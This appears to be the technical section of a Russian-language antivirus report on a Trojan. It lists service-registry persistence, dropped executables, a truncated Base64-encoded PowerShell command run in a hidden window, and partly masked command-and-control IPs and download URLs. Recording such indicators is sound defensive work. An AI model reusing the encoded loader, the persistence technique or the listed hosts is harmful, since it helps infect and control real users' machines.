Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\DWrite] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\DWrite] 'ImagePath' = '"%WINDIR%\SysWOW64\usbui\DWrite.exe"'
- 'DWrite' "%WINDIR%\SysWOW64\usbui\DWrite.exe"
- 'DWrite' %WINDIR%\SysWOW64\usbui\DWrite.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLADkANABwAGwAcgBqAD0AKAAnAEQAJwArACgAJwBtAG8AMAAnACsAJwBiAHIANAAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAVABlAG0AcABcAHcAbwBSAGQAXAAyADAAMQA5AFwAIAAtAG...
- %TEMP%\word\2019\e0kb0j.exe
- %WINDIR%\syswow64\usbui\dwrite.exe
- %TEMP%\word\2019\e0kb0j.exe в %WINDIR%\syswow64\usbui\dwrite.exe
- '88.##9.181.198':443
- http://za###life.com/wp-includes/P2Anjqkwlc4858/
- http://88.###.181.198:443/9DVneEFl6f/BwrBE4c235rS/sxBFmw/ via 88.##9.181.198
- DNS ASK za###life.com
- '%TEMP%\word\2019\e0kb0j.exe'
- '%WINDIR%\syswow64\usbui\dwrite.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLADkANABwAGwAcgBqAD0AKAAnAEQAJwArACgAJwBtAG8AMAAnACsAJwBiAHIANAAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAVABlAG0AcABcAHcAbwBSAGQAXAAyADAAMQA5AFwAIAAtAG...' (со скрытым окном)